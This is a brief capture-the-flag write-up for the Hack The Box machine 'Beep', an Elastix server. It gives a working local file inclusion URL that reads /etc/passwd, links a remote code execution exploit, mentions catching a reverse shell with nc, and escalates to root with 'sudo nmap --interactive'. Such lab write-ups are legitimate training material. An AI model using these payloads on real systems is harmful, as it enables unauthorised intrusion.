Beep (Hack The Box Writeup)


URL : https://app.hackthebox.eu/machines/Beep

IP : 10.129.1.226

Recon

  • 80 port is a login page
    • Elastix

Find Payload

LFI

  • Elastix 2.2.0 – ‘graph.php’ Local File Inclusion
    • https://www.exploit-db.com/exploits/37637
  • Try LFI
    • https://10.129.1.226/vtigercrm/graph.php?current_language=../../../../../../../etc/passwd%00&module=Accounts&action
  • With python request script, it will throw a exception, because the ssl version is toooo ol.
    • https://stackoverflow.com/questions/32330919/python-ssl-ssl-sslerror-ssl-unsupported-protocol-unsupported-protocol-ssl
    • Use this command to change the min version of TLS
      • sed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf

RCE

  • Find RCE Code
    • https://github.com/infosecjunky/FreePBX-2.10.0—Elastix-2.2.0—Remote-Code-Execution/blob/master/exploit.py
  • Turn nc to receive reverse shell

Privilege Escalation

  • sudo -l check , we can sudo nmap
  • sudo nmap --interactive
,

發表迴響